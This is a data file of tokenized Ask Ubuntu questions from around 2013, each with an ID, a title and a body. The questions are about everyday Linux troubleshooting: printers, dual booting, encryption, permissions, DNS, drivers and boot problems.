381534	12.04 installing lexmark s605 on network	i have n't used unix for twenty years , heaven help us i was a unix box product manager once . my how it 's changed , i 'll call myself a newbie . anyway : i have a lexmark s605 printer on the network . it works fine from the windows machines . ( not really fine but that 's beside the point ) . i know its ip address 192.168.1.38 . it 's definitely there if i enter the ip address in the browser i get a status screen with ink levels etc . i have downloaded lexmark-printer-utility-1.0-2.amd64.deb and software centre tells me it 's been installed . tried in system settings > printing > add > network printing - host 192.168.1.38 , and press find it gives me port 9100 , and declares this is a jetdirect ( ? ) . then pressed forward , it searches endlessly for drivers . cancel/ i am offered : select drivers from database but that is n't showing my printer , provide ppd is n't right ( is it ? ) search for a driver again gets nowhere i 'm somewaht narked lexmark do n't appear to give any sort of guide , and i 'm feeling rather dumb . can some one point me in the right direction ?
381536	connecting to 2 external monitors	i 'm new to ubuntu and i have a dell e6430 laptop i use the dell docking station that have 2 ports vga and dvi in windows i can connect both of them to 2 external dell monitors but in ubuntu 13.10 i can only use the vga port i would like to know how i do it like in windows ( laptop screen & external screen on vga port & external screen on d v i port ) i checked the display setting in but the ubuntu can only detect the laptop screen and the screen on the vga port only
381537	wait for key after nautilus-actions in terminal	i need to execute a script from the nautilus-actions and then wait for any input from the user , who has to read what the script has done before the terminal disappears . this is my current nautilus-actions configuration : runtime execution : gnome-terminal -x sh -c command make executable : path : gksudo parameters : chmod +x % f this script makes a file executable ( +x ) but i 'd like to actually see the chmod output , if any , before the terminal is closed . can this be achieved ?
381540	how to share ubuntu laptop ethernet to android 4.2.2 via usb ?	i am using ubuntu 12.04 laptop and 4.2.2 android phone . my phone can not show ad-hoc network from my ubuntu sharing network . so now i try to connect internet via usb from computer . i 've seen this solution for windows only , is there one for ubuntu ?
381543	dual-boot selector like windows	a few days ago , i 've installed ubuntu 12.04 , and when i load my pc , i get this menu : . what i want is to have this menu : but showing the two operating systems ( windows 8 and ubuntu ) . is it possible to move to that dual-boot interface ? thanks .
381545	can not mount external hdd . help !	i connected my external hdd to my tv and the tv did not recognize it . after that i ca n't open it on my computer any more . i tried fsck which kept asking more and more questions . fearing that i would make the data impossible to retrieve by giving wrong answers ( y/n ) , i stopped in the middle . the error message has changed since ( it used to be about invalid fs type ) it would n't open on windows either ( win 7 on vm ) . i believe the original format was ntfs current error : error mounting /dev/sdb1 at /media/ [ username omitted ] /28bc82aa-d4bd-459e-b071-16839167a6da : command-line `mount -t `` ext4 '' -o `` uhelper=udisks2 , nodev , nosuid '' `` /dev/sdb1 '' `` /media/ ... /28bc82aa-d4bd-459e-b071-16839167a6da '' ' exited with non-zero exit status 32 : mount : /dev/sdb1 : ca n't read superblock the data is very important to me and i do n't have any other copy of some of it
381548	bash error when trying to execute a file	i am kinda new to linux and in programming so please excuse my lack of knowledge . i 'm trying to run a basic program named trial.c with an executable file named trying but when i type ./trying in the terminal this error comes up : bash : ./trying : permission denied the folder is on my hdd with 3 partitions , one for home , another for my ubuntu_files , and the other is a fat32 partition named misc . the folder is inside the fat32 partition of my hdd . the problem is no matter how much i try to use chownand chmod ( both with recursive ) to change the permission of the folder containing the trial.c and the executable ( trying ) file , the bash error message would still stay the same . the user is nciacrklo , and i typed groups nciacrklo to see what group is associated with that user and tried the codes found below in my terminal . sudo chown nciacrklo : nciacrklo /media/nciacrklo/misc/libusb -r -v and after that it said : ownership of `/media/nciacrklo/misc/libusb/trying ' retained as nciacrklo : nciacrklo ownership of `/media/nciacrklo/misc/libusb/trial.c ' retained as nciacrklo : nciacrklo and then , sudo chmod 755 /media/nciacrklo/misc/libusb -r -v it then said , mode of `/media/nciacrklo/misc/libusb/trying ' changed from 0644 ( rw-r -- r -- ) to 0755 ( rwxr-xr-x ) mode of `/media/nciacrklo/misc/libusb/trial.c ' changed from 0644 ( rw-r -- r -- ) to 0755 ( rwxr-xr-x ) finally , i tried the ./trying again but same error appeared . bash : ./trying : permission denied please please help me i 'm struggling with this and yet i have to do lots of programming about the libusb topic > . < . any comments about how to use libusb to acquire pictures from webcam would also be much help . thanks ! ! ! \m/ ,
381555	can we run same program or antivirus software at windows as well as on ubuntu ?	i would like to access some windows programs on ubuntu . if at all possible i would like to access programs installed on windows like antivirus software , flash , silverlight etc . how do i do this ?
381563	how can i remove an autostart service that is not listed in gnome-session-properties ?	today i upgraded from raring to saucy . this brought the ubuntu one icon back to my indicator applet , which i had disabled . so i removed the line nodiplay=true from /etc/xdg/autostart/ubuntuone-launch.desktop . but still ubuntu one does n't show up in gnome-session-properties and i ca n't disable it . what gives ?
381564	dual boot install windows7 after ubuntu12.04	can not install windows7 ( dual boot ) after installing ubuntu12.04 . i want to install windows7 currently i have ubuntu12.04 . i want to dual boot unetbootin does not work . i have ubnutu12.04 currently installed please tell me the steps to install windows along side this is what happens and it does not boot automatically even after timeout
381567	netflix on ubuntu studio w/o wine ?	i know that there is a few different ways of getting silverlight ( and thus netflix ) to work with wine , but i find that this is more a hassle than anything . netflix quaility is low and i would rather jump back to my windows install instead of watching a show or film on the lower , choppier quaility . i am asking here if anyone found a stable working way to get netflix to play in ubuntu outside of the current popular items you find by net searching . thanks in advance .
381568	forwarding plex media server via ssh	i 'm using plex media server for viewing movies when i 'm on my university network . when i 'm back home i 'd like to watch my films on my tv , too . using myplex is no choice for me because the server has no access to the internet but to addresses of the university network . i use a vpn connection to get an ip address of the university network when i 'm at home and can connect to my server via ssh . now i 'd like to access the plex media server placed in the university network in my home network . is there a way to do it via ssh ?
381572	compatibility issues with hd7990 graphics card	just upgraded my graphics card from a hd6970 to a hd7990 . have tried ubuntu 13.10 , the last lts and also kubuntu 13.10 but none will run a display properly . even when booting from a live usb/dvd i get a currupted display . clean installs do not help . in particular , ubuntu displays strange behaviour . the launch bar , the dash , and the shutdown options ( accessed when pressing the computers power button ) all display properly , but everything else is a mash of crazy colours . are these known issues ? ca n't find anything about it anywhere . i am relegated to using windoze again ( in which it works perfectly ) , it is not happy times : ( screenshot : any info gratefully appreciated . hopefully it is hardware that will be supported soon .
381573	thumbnails in nautilus in ubuntu 13.10	after upgrading to 13.10 , nautilus stopped producing and showing thumbnail icons for images and videos . also in kde environment , there 's no longer a standard icon for nautilus in start menu ( or its submenus ) . how should i solve these problems with nautilus . edit : â âbefore upgrading both could have proper thumbnails .
381574	drivers for tp-link tl-wn725n nano usb wireless n adapter	can you advise me on what drivers to install for the tp-link tl-wn725n usb wireless adapter on ubuntu 12.04 . tp-link only provide windows drivers .
381575	how to boot iso files with grub2	i am a newbie here.i have install ubuntu 13.10 for a few days . i love the powerful grub2 bootloader.so i made a bootable usb stick with grub2 installed in the usb 's mbr . i have sucessfully booting the ubuntu 13.10 fedora 19 opensuse 13.1 iso files but i cant't boot the windows 7 and `debian jessie ( debian 8 ) iso files . can you tell me how to boot these iso files ? by the way , my usb 's file system is ntfs .
381579	pc bios does n't `` see '' iso image	i 've searched the previous issues thoroughly and do n't see the problem i 'm encountering . i 'm trying to boot an older dell 32-bit intel machine from an ubuntu iso dvd . the curve ball is that i do n't have another pc to make the dvd on , so i 'm using my mac ( running osx 10.6 snow leopard ) . i downloaded the proper iso file to my mac ( 32-bit , ubuntu-12.04.3-server-i386.iso ) and checked the md5 hash with the published one on ubuntu.com . all good . using precisely the instructions here : http : //www.ubuntu.com/download/desktop/burn-a-dvd-on-mac-osx i burned the .iso file onto a dvd . the disk verifies fine . one odd thing to note : if i try to `` open '' the downloaded .iso volume with the mac disk utility , it says , `` no mountable file systems . '' likewise , if i try to mount the newly burned dvd , it wo n't work for the same reason . however , i can `` convert '' the iso file using the disk utility , which blows it out into a directory with files you 'd expect to see on a boot disk . more on this converted directory later . i take the newly burned and verified iso dvd to the pc and try to boot from it . the dvd reader , btw , is the topmost device in the boot list . the reader spends a while reading the dvd ( the light comes on and it spins up ) but then the bios simply prints out : `` missing operating system '' . now , to eliminate the possibility of a bad dvd reader , we took an old ( 2002 ) red hat linux boot cd we had and tried that . it was recognized immediately and the linux install program started up . however , that does n't appear to be an iso image , because if i put that in my mac , it mounts immediately and i see the boot files , etc . and yes , the drive in the pc is a dvd reader , not a cd reader . so , i thought perhaps the aged pc 's bios might not like iso files , so i took the `` converted '' directory files ( recall those from above ? ) and burned them to a dvd and tried to boot from that . still the same `` missing operating system '' message .
381585	sgid wo n't work	i 'm struggling with the sgid command . given the following situation : -- -- rws -- - 1 simon simon 233 nov 24 13:52 hosts why ca n't a user open/edit this file ?
381587	no wifi in xubuntu 12.04	i recently installed xubuntu 12.04 on my toshiba satellite . to my dismay , i could not get a wifi connection . i know the computer has wifi , because it worked before . i can get a wired connection . i 've even tried putting in a wifi adapter and letting it connect over night . it still did n't work . it just keeps asking for my wifi password . why is this ?
381588	ca n't remove citrix receiver : dpkg error	i recently tried to install citrix receiver . ever since i ca n't seem to update anything . everytime i try i get the error : run the following command in a terminal : apt-get install -f when i do that i get the error : '' dpkg : error processing /var/cache/apt/archives/libmotif-common_2.3.4-4_all.deb ( -- unpack ) : trying to overwrite '/usr/include/x11/bitmaps/xm_hour16 ' , which is also in package openmotif 2.3.1-2 errors were encountered while processing : /var/cache/apt/archives/libmotif-common_2.3.4-4_all.deb '' can anybody help me with this ?
381589	dns server problems : server not found	i am having two problems with my dns server . my 1st problem is that i get the error `` server not found '' when i type in my site in firefox . problem two is if i type in the ip i get this . index of / [ ico ] name last modified size description [ dir ] pfeiffcomm/ 09-oct-2013 08:34 - apache/2.2.22 ( ubuntu ) server at 192.168.1.142 port 80 here is my config files . file : /etc/bind/pfeiffcomm.net.db : ; ; bind data file for pfeiffcom.net.db ; $ ttl 604800 @ in soa pfeiffcomm.net . root.pfeiffcomm.net . ( 2 ; serial 28800 ; refresh 3600 ; retry 604800 ; expire 38400 ) ; negative cacha ttl in a 192.168.x.x ; @ in ns ns.pfeiffcomm.net . pfeiffcomm.net in a 192.168.x.x @ in aaaa : :1 ns in a 192.168.x.x file : /etc/bind/0.168.192.in-addr.arpa : ; ; bind reverse data file for 0.168.192.in-addr.arpa ; $ ttl 604800 @ in soa ns.pfeiffcomm.net . root.pfeiffcomm.net . ( 2 ; serial 604800 ; refresh 86400 ; retry 2419200 ; expire 604800 ) ; negative cacha ttl ; @ in ns ns . 142 in ptr ns.pfeiffcomm.net . file : etc/bind/named.conf.local : // // do any local configuration here // // consider adding the 1918 zone here , if they are not used in you // organization // include `` /etc/bind/zones.rfc1918 '' ; zone `` pfeiffcomm.net '' { type master ; file `` /etc/bind/pfeiffcomm.net.db '' ; } ; zone `` 0.168.192.in-addr.arpa '' { type master ; file `` /etc/bind/0.168.192.in-addr.arpa '' ; } ; zone `` zones.rfc1918 '' { type master ; file `` /etc/bind/zone.rfc1918 '' ; } ; file : /etc/bind/named.conf.options : forwarders { 167.142.199.153 ; 167.142.199.151 ; 8.8.8.8 ; } ; what did i do wrong and how can i fix it ?
381592	xubuntu ftp server with 3 user and 1 folder	i want an ftp server with three user accounts . i have permission to both read and write , and the other two users are only on /var/ftp/ folder . they just have read permission . how to do that ?
381593	how to use debcondf show results with debconf-set-selections ?	i 'd like to know in common how to use the results of debconf-show with debconf set selections to precvonfigure deb packages with teh command line or within a shell script for example if i use sudo debconf-get-selections | grep java7 > result ; cat result i get the following oracle-java7-installer shared/present-oracle-license-v1-1 note oracle-java7-installer oracle-java7-installer/local string oracle-java7-installer shared/accepted-oracle-license-v1-1 boolean true oracle-java7-installer shared/error-oracle-license-v1-1 error oracle-java7-installer oracle-java7-installer/not_exist error how would the right debconf set selections line look like to configure the two dialoges that appear trough the installation ?
381599	html files thumbnail preview	sometime back , i was using 12.04 and it was displaying thumbnail previews of html pages just like it does for images and videos . i upgraded to 13.04 and somehow lost that feature . now my html pages are displayed as text files with the icon showing about the first four lines of code instead . how can i get that feature back ? edit check the html files in the screenshot below : thanks .
381601	windows does n't boot after updating to 13.10	windows 7 still appears as an option in grub but when i choose it , it does nothing and goes back to the grub selection screen . i have tried boot-repair but it 's still the same issue . here 's the log from boot-repair : http : //paste.ubuntu.com/6468928/ .
381602	create file for new user	i 'm creating custom build of ubuntu with some installed packages . my question is how to put a file on desktop automatically after creating new user ? for example something.txt containing some text .
381604	crypttab syntax for luks container with key file or passphrase	i am able to boot either by using a usb-key , or a passphrase . but i would like to have both methods available on boot . i would like that after a timeout , if no usb-key is plugged , the system on boot asks me for a passphrase . so i added the two following lines in /etc/crypttab name uuid= < ... > /dev/disk/by-label/nameofusbkey : /name_of_mykey:1 luks , keyscript=/lib/cryptsetup/scripts/passdev name uuid= < ... > none luks i reinitialize initramfs , and the system on boot is blocked without the usb key . it boots normally with the usb key of course . the `` :1 '' is a timeout . but it just means that after 1 second , without usb key plugged and containing the key , the system is just blocked . is there a way to have on boot the two methods available : key on usb key and passphrase on prompt ? the file readme.initramfs is not very helpful . ( of course , if i comment out the first line and if i reinitialize initramfs , my pc asks me for the passphrase . ) maybe by using another script than passdev ?
381606	making title bars transparent in unity is n't working	i 've found this way to make title bars in unity transparent : open dconf-editor navigate to org.compiz.gwd modify metacity-theme-active-opacity and metacity-theme-inactive-opacity however , ths method is n't working . please help me . and tell me what additional info you need ... raring x64
381613	how to return from grub prompt to the grub menu ?	if you press escape in grub menu you endup with grub command prompt . my question is how can i go back to the menu , without rebooting ?
381619	sudden black screen after login xubuntu 13.10	everything worked fine ( except for the audio widget ) , and suddenly , i boot and after i set my login credentials in the session manager , the screen goes black . how is one supposed to fix it ? i find nothing on the internet about this exact problem , and the only thing i 've found is unsolved . i did nothing , not even installing new packages . this is truly a problem for me , can somebody help ?
381621	no access to phpmyadmin	i ca n't access phpmyadmin . i get this classic forbidden error : you do n't have permission to access /phpmyadmin on this server . i installed phpmyadmin via apt-get . i choosed apache2 in the installation progress . the first weird thing is , that no phpmyadmin.conf symlink is created in conf.d folder of apache . the next weired thing is , that i can create the symlink myself , restart the apache and the mysql server without any error and get the same forbidden error . the apache.conf from phpmyadmin is the default one . i 'm using the user root . could that be a problem with user : usergroup of some files ?
381622	locale reverts to old locale after exiting root ?	heyo~ i am having an issue whenever i change locale . at present , i am getting this error whenever i run the locale command . locale : can not set lc_all to default locale : no such file or directory lang= language=en en lc_ctype= '' posix '' lc_numeric=en lc_time=en lc_collate= '' posix '' lc_monetary=en lc_messages= '' posix '' lc_paper=en lc_name=en lc_address=en lc_telephone=en lc_measurement=en lc_identification=en lc_all= after entering root using 'sudo -i ' or 'sudo su ' , i use 'export lc_all= '' en_gb '' ' . using locale whilst in root gives this . lang= language=en en lc_ctype= '' en_gb '' lc_numeric= '' en_gb '' lc_time= '' en_gb '' lc_collate= '' en_gb '' lc_monetary= '' en_gb '' lc_messages= '' en_gb '' lc_paper= '' en_gb '' lc_name= '' en_gb '' lc_address= '' en_gb '' lc_telephone= '' en_gb '' lc_measurement= '' en_gb '' lc_identification= '' en_gb '' lc_all=en_gb however , after leaving root , via 'exit ' , 'reboot ' or simply closing the terminal , the changes completely revert and the `` locale : can not set lc_all to default locale : no such file or directory '' error returns . the output of 'locale ' is the same as before i used 'export lc_all= '' en_gb '' ' i 've attempted to use 'dpkg-reconfigure locales ' to no effect . anyone know how to fix this ?
381624	lvm on encrypted partition drops me to initramfs root missing	i installed ubuntu 13.10 64bit on my pc . i have single hard disk ( /dev/sda ) with lvm encrypted partition . so the problem is that after reboot i can not start ubuntu ( it dropped me to initramfs prompt with message : /dev/mapper/kubuntu ... .-root missing ) so i think it is because during boot it can not open /dev/sda5 with cryptsetup . if i do chrooting i can open partition and mount encrypted root partition . i tried to add in grub parameter : cryptopts=target=sda5_crypt , source=/dev/sda5 , lvm=vg-root but in cosole during boot i see that no lvm volume is found on sda5 ? i also find message : scripts/local_top/cryptroot : line 1 /sbin/cryptsetup : not found can anybody have idea what is wrong ? i tried system upgrade , created cryptroot file , regenerated initram file .
381625	no gui boot in a mac powerpc	i scored a mac g5 , and i installed 12.10 lubuntu alternative powerpc on it this morning . now , when i boot in , it goes to a black screen with text allowing me to log in . however , if functions like a terminal . there is no desktop . can someone help me out ? i have an nvidia graphics card .
381629	ubuntu 13.10 i386 iso would not mount or burn in mac os x 10.9	i have downloaded the ubuntu 13.10 i386 iso image numerous times , and when double-clicking the iso , it would come up with an `` no mountable file systems '' error . disk utility would successfully burn the iso , but it would still be unreadable and unmountable by my mac . i have checked and compared the md5 string + it works perfectly fine under virtualbox . the ubuntu-13.10-desktop-amd64+mac.iso image mounts and burns successfully . basically , i 've been unable to use ubuntu on a 32-bit mac ever since 12.04 ( except under virtualbox ) ; is there any way of getting a +mac version of the iso ( e.g . without the multi-catalog implementation if that 's the source of the problem ) ? thank you !
381632	how can i use pygi webkit on a headless server install ?	i have a set of scripts that works on my laptop that works fine as long as i 'm booted in to an x session , but if i 'm running on a headless server install i get loads of critical fails from gtk . i 'm sure the solution is to use xvfb , but i ca n't find a working example . assistance appreciated .
381636	swiss keyboard - clamps	for my it-project i need to use bracket characters . but with ctrl+alt+端 it does n't work . what are the combinations and where i can edit these ? it 's very heavy to work with other keyboard combinations .
381637	remove access to folder and files for 1 user	i want to be able to remove access to a folder and all of it 's files for 1 user on my server , but i would like everyone else on the server to be able to access the folder and files . i do n't think i can chmod it because that applies to everyone ( i believe ) . so if the user were to login to the system using their account and run vim on the file , they should n't be able to see the contents of it . all i want this user to have access to is 3 directories , which are in another user 's folder . what can i do to achieve this ? edit : i have created a user group called untrusted and added my user into that group . i would now like to remove permissions from everything and add them only on the 3 folders ( and subfolders ) . i am not sure what to do here ...
381639	reset windows password with ubuntu live cd	a friend brought me his pc with windows vista to reset the user password because he did n't use it for a long while and forgot his password . so i found a tutorial on how to reset the password by using a ubuntu live cd and the software chntpw . after i installed this software i mounted the system partition by opening it with the file explorer . it is now available at /media/system/ the tutorial says i have to open the file /windows/system32/config/sam with chntpw and reset the password with chntpw -u username sam after i did this it did n't show me any errors . so i unmounted the partition and rebooted the pc with the installed windows vista . it is still locked with the old password . did i do any mistakes or is there an other way to reset the password ?
381642	ca n't change file permissions !	i just ca n't change any file permissions even when i am logged in as root . i tried changing the permissions from both terminal and i got no errors but the permissions remain the same . and when i try to change by right clicking and selecting permissions tab in properties they instantly revert back . am using ubuntu 13.10
381645	how to execute a script with cron	i would like to schedule a simple script to execute when the machine reboots . i have other schedule other commands in crontab using @ reboot without any problems , but i ca n't seem to get my script to work . the script executes through the command line as well as when i double click on it . it is a permissions problem ? the cron line i 'm trying to use is : ' @ reboot /path/to/script.sh'
381650	black screen while installing ubuntu 13.10 help !	i just bought an alienware m17x r4 ( nvidia速 geforce速 gtx 765m and intel haswell graphic cards ) , i am trying to install ubuntu 13.10 , just after booting on the cd and choosing the installation option the screen goes black , i want to use the cli option ( f4 modes ) but i have only 3 options : normal user drive update disc oem install ( only manfacturers ) has anyone a similar problem before ? thank you for you help
381652	problem in dualbooting	i am having new 4th generation hp 15-n004tx laptop . i am unable to do dual booting ubuntu on windows 8 . whenever i try to load windows 8 from grub loader its getting crash so please help me on this .
381653	ssh connection refused after logout and try to login again	my problem is similar to this thread : ssh connection refused when connecting remotly i use putty to ssh from my windows computer to a vps server . the system is ubuntu 12.04 . but when i logout then i can not login again . what is the possible solution to the problem . i 've tried to solve this by reinstalled ubuntu . but as i did it three times it happened all three times . putty and its sibling winscp allow me just to do basic jobs like installing lamp stack and basic functions needed to run a website . if i stay connect for too long it disconnect itself and i can not connect to the server again . this means that my installation is half way through finish . in this case , the job that was half finished is still working . thank you ,
381654	secure boot idea block usb boot	i saw when my computer battery was low , it automaticly hibernate and when i opened it again i dont see boot device option or bios setting keys . so if we send hibernate code every shutdown or reboot , can we block usb boot hacks ?
381657	forget administration accont name & password	i have forgotten my administration account name & password , plus i changed the administration account to standard account . how can i change a standard account to an administration account .
381659	doubts about symbolic link printer brother all-in-one [ solved ]	i have a doubt and confusion regarding symlinks on settings of `` brother mfc-660cn printer '' i installed the drivers through an installation file of the website brother the file is `` linux-1.0-installer-brfax '' installed everything right without errors ... but in the /var/log/sys.log or on boot appear this : fx6300 udevd [ 412 ] : unknown key 'sysfs { idvendor } ' in /etc/udev/rules.d/40-brother-libsane-type1.rules:17 fx6300 udevd [ 412 ] : invalid rule '/etc/udev/rules.d/40-brother-libsane-type1.rules:17' in the file /etc/udev/rules.d/40-brother-libsane-type1.rules i have this : > # udev rules sample for brother mfp > # version 1.0.0-1 > # > # copyright ( c ) 2012 brother . industries , ltd. > # > # copy to /etc/udev/rules.d or /lib/udev/rules.d > # > > > action ! = '' add '' , goto= '' brother_mfp_end '' > > subsystem== '' usb '' , goto= '' brother_mfp_udev_1 '' subsystem ! = '' usb_device '' , > goto= '' brother_mfp_end '' label= '' brother_mfp_udev_1 '' > > > sysfs { idvendor } == '' 04f9 '' , goto= '' brother_mfp_udev_2 '' > attrs { idvendor } == '' 04f9 '' , goto= '' brother_mfp_udev_2 '' > goto= '' brother_mfp_end '' label= '' brother_mfp_udev_2 '' > > # attrs { binterfacenumber } == '' 01 '' , goto= '' brother_mfp_udev_3 '' > # attrs { binterfacenumber } == '' 02 '' , goto= '' brother_mfp_udev_3 '' > # attrs { binterfacenumber } == '' 03 '' , goto= '' brother_mfp_udev_3 '' > # goto= '' brother_mfp_end '' > # label= '' brother_mfp_udev_3 '' > > attrs { binterfaceclass } ! = '' 0ff '' , goto= '' brother_mfp_end '' > attrs { binterfacesubclass } ! = '' 0ff '' , goto= '' brother_mfp_end '' > attrs { binterfaceprotocol } ! = '' 0ff '' , goto= '' brother_mfp_end '' > > # mode= '' 0666 '' > # group= '' scanner '' env { libsane_matched } = '' yes '' > # symlink+= '' scanner- % k '' > > label= '' brother_mfp_end '' in the file /lib/udev/rules.d/40-libsane.rules : # kernel < 2.6.22 jumps here label= '' libsane_usb_rules_begin '' # brother scanners attrs { idvendor } == '' 04f9 '' , attrs { idproduct } == '' 01b0 '' , env { libsane_matched } = '' yes '' # the following rule will disable usb autosuspend for the device env { libsane_matched } == '' yes '' , run+= '' /bin/sh -c 'if test -e /sys/ $ env { devpath } /power/control ; then echo on > /sys/ $ env { devpath } /power/control ; elif test -e /sys/ $ env { devpath } /power/level ; then echo on > /sys/ $ env { devpath } /power/level ; fi ' '' label= '' libsane_usb_rules_end '' when i install anything from terminal i have this error too : /sbin/ldconfig.real : /usr/lib/libbrcolm2.so.1 is not a symbolic link /sbin/ldconfig.real : /usr/lib/libbrscandec2.so.1 is not a symbolic link when i use the ls -l command i have this : $ ls -l /usr/lib/libbrscandec2.so -rwxr-xr-x 1 root root 37064 nov 23 18:21 /usr/lib/libbrscandec2.so $ ls -l /usr/lib/libbrscandec2.so.1 -rwxr-xr-x 1 root root 37064 nov 23 18:21 /usr/lib/libbrscandec2.so.1 $ ls -l /usr/lib/libbrscandec2.so.1.0.0 -rwxr-xr-x 1 root root 37064 nov 23 18:21 /usr/lib/libbrscandec2.so.1.0.0 $ ls -l /usr/lib64/libbrscandec2.so lrwxrwxrwx 1 root root 29 dez 2 2009 /usr/lib64/libbrscandec2.so - > /usr/lib64/libbrscandec2.so.1 $ ls -l /usr/lib64/libbrscandec2.so.1 lrwxrwxrwx 1 root root 33 dez 2 2009 /usr/lib64/libbrscandec2.so.1 - > /usr/lib64/libbrscandec2.so.1.0.0 $ ls -l /usr/lib64/libbrscandec2.so.1.0.0 -rwxr-xr-x 1 root root 37064 dez 2 2009 /usr/lib64/libbrscandec2.so.1.0.0 $ ls -l /usr/lib/libbrcolm2.so -rwxr-xr-x 1 root root 15072 nov 23 18:21 /usr/lib/libbrcolm2.so $ ls -l /usr/lib/libbrcolm2.so.1 -rwxr-xr-x 1 root root 15072 nov 23 18:21 /usr/lib/libbrcolm2.so.1 $ ls -l /usr/lib/libbrcolm2.so.1.0.1 -rwxr-xr-x 1 root root 15072 nov 23 18:21 /usr/lib/libbrcolm2.so.1.0.1 $ ls -l /usr/lib64/libbrcolm2.so lrwxrwxrwx 1 root root 26 dez 2 2009 /usr/lib64/libbrcolm2.so - > /usr/lib64/libbrcolm2.so.1 $ ls -l /usr/lib64/libbrcolm2.so.1 lrwxrwxrwx 1 root root 30 dez 2 2009 /usr/lib64/libbrcolm2.so.1 - > /usr/lib64/libbrcolm2.so.1.0.1 $ ls -l /usr/lib64/libbrcolm2.so.1.0.1 -rwxr-xr-x 1 root root 15072 dez 2 2009 /usr/lib64/libbrcolm2.so.1.0.1 i do not know if is the correct way that i think but .. in the folder : /usr/lib64/ the symbolic link is from : libbrscandec2.so to libbrscandec2.so.1 and ends in libbrscandec2.so.1.0.0 ? the same for libbcolm2.so ? from what i 've understood from other posts the symbolic link are to be between the folders : /usr/lib/ and /usr/lib64/ or am i thinking in the wrong way ? â what 's wrong here ? i appreciate any help on this.. thanks .
381663	audio is out of sync with avconv	i 'm broadcasting to justin tv with this script found on github on ubuntu 12.04 . i am having issues with the audio going out of sync and getting worse as i go through my playlist . this is the code i 'm using for avconv . and i ca n't figure out how to set the bitrate for the audio . i 've seen -b as bandwidth but it looks like it should be the audio bitrate . how to resolve this ? avconv \ -f x11grab -s $ inres -r `` $ fps '' -i :0.0 \ -f alsa -ac 2 -i pulse \ -vcodec libx264 -s $ outres -preset $ qual \ -acodec libmp3lame -ar 44100 -threads 4 -qscale 3 -b : a 98304 -bufsize 512k \ -f flv `` rtmp : //live.justin.tv/app/ $ stream_key ''
381664	i ca n't receive files via bluetooth on lxde	i needed to receive a pdf file from a friend in a class . i use ubuntu lxde ( 13.10 ) and my friend had a samsung tablet . i enabled bluetooth . we went through some sort of `` setup '' and entered a security code and so and it seemed that this step was completed successfully . he tried to send me the file but i had no notifications coming up or anything and he got a `` sending error '' after a while . i searched for a `` receive mode '' or something but could n't manage to find anything . i was able to send a file to him ! even later i looked around quickly in unity but still did n't know how to receive files . ... how ? : d
381665	remove the suffix `` - dolphin '' from the dolphin title bar	in kubuntu , if i have a dolphin window open in the home folder , the title bar reads `` home - dolphin '' . can i change this to just read `` home '' ?
381667	ca n't install ubuntu 12.04 lts	i have acer aspire 4752 with windows8 and i tried to install ubuntu 12.04.3 lts but failed the 'grub-efi-amd64-signed ' package failed to install in /target/ my aspire not support uefi and do n't have secure boot menu in bios how to solve this issue ?
381668	how to make my laptop bootable to windows 8 and ubuntu 12.04 ?	i have a sony vaio pro 13 , which came pre-installed with windows 8 and the vaio care/rescue utility . my goal was to make it dual-bootable to ubuntu 12.04 as well . as it turns out , the ubuntu install worked , but it is not bootable , and after a few runs of boot-repair , it does not boot to windows 8 and i can not access the recovery partition that is built into the laptop . the only thing i can do is boot from my liveusb ( with try ubuntu ) the last boot-repair gave me this : http : //paste.ubuntu.com/6464375 and after i tried to recover windows this http : //paste.ubuntu.com/6469950
381670	`` fatal error : gl/glfw.h : no such file or directory # include < gl/glfw.h > '' - how to solve it ?	i 'm trying to install glfw to develop a opengl 3.0+ program and i 've followed a few tutorials on how to install glfw and i keep getting this error . i know i have installed it correctly with cmake , make and make install . i 'm running on a hd5700 series and have installed the ati drivers and it seems to be working just fine . maybe the file is in a place it should n't be ?
381671	ubuntu boot on mac - can not operate wireless keyboard	i installed ubuntu on my mac and have a wireless keyboard . i am using refit and do not have access to the wireless keyboard to even boot into ubuntu . i know this has something to do with the bios , but i ca n't seem to figure out how to change it.. also , when i am in the desktop inside ubuntu , my keyboard connects fine , when i then type on the keypad only a few letters work , but , come up as numbers ? any help would be appreciated
381675	using turboboost on ubuntu with i7 processor	i am checking my cpu speed by using i7z , but it seems the turboboost feature does not work on my computer . i also read : how do i get turbo boost working ? and is turbo boost working ? but the problem is the same . how can i make sure that turboboost is working or not ?
381679	why is my sound so quiet ?	i use my motherboard 's built-in audio and ubuntu 12.04.3 . my volume is turned all the way up to 100 % , and it 's still too quiet . the common solution of turning pcm to the maximum in alsamixer did n't help , as it was already at the maximum . here 's a screenshot of alsamixer : is there anything else i can do ?
381681	ca n't install ubuntu : it remains blocked while installing	i tried to install ubuntu . i did the partition . i thought everything right . but when i 'm waiting for it to install , at the end of it , it said 'saving installed packages ' ... . and it remains here for hours . what should i do ?
381683	a small problem at start up ?	every time i start up my computer it shows these lines of text , is it a problem ? if so how do i go about fixing this . [ 16.615416 ] ata6 : exception emask 0x10 sact 0x0 serr 0x4000000 action 0xe frozen [ 16.615422 ] ata6 : irq_stat 0x00000040 , connection status changed [ 16.615425 ] ata6 : serror : { devexch } pretty much that like repeats a couple time text the same but numbers in the brackets in the beginning changing . i would greatly appreciate some help . -thank you , b_rad_gonz
381684	my sql db will restart while doing apt-get upgrade/update in ubuntu ? please confirm	i am planning to install security patches in ubuntu server 12.04 by using appt-get update/upgrade . kindly confirm while doing security patch gradation , mysql-db service will get restart ? and also confirm after patches installation , is it recommended to restart the whole server to get affect patch installation .
381685	could not install ubuntu desktop 13 on my toshiba satellite	i tried to install ubuntu desktop 13 on my toshiba satellite running on win7 64 bit on virtualbox , but the virtualbox installation failed , saying not compatible with the processor . my laptop has an i3-3110m cpu . which installation disk should i use ?
381686	windows 8.1 wo n't let me start up from ubuntu cd	when i start up my computer , i get the `` choose your operating screen '' to let me install ubuntu , but when i choose ubuntu , my disk whirls for a bit then the computer just shuts off .
381687	lenovo fnlk key ( enabled on boot )	is there a program to enable function-lock ( fnlk ) upon login ? in fact the bios has fnlk on while booting , then it turns once the desktop ui is loaded . i 'm open to suggestions of using a program or custom script to enable this upon user login . p.s . this fnlk key is found on lenovo notebooks .
